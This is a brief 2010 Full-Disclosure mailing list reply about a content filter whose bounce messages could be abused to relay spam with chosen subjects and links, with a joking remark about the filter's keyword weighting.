On Fri, Dec 24, 2010 at 12:42:18AM +, Thor (Hammer of God) wrote: Classic. Just send him an email with the link you want from whatever address you want, and you can spam people with the subject, including links. :) I got one bounce too for the common word for practicing the art of non-platonic love... Btw, check for Expression: _ Triggered 1 times weighting 5^M (near the end of the bounce) Wouldn't the underscores trigger the other spoofed content filter? ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
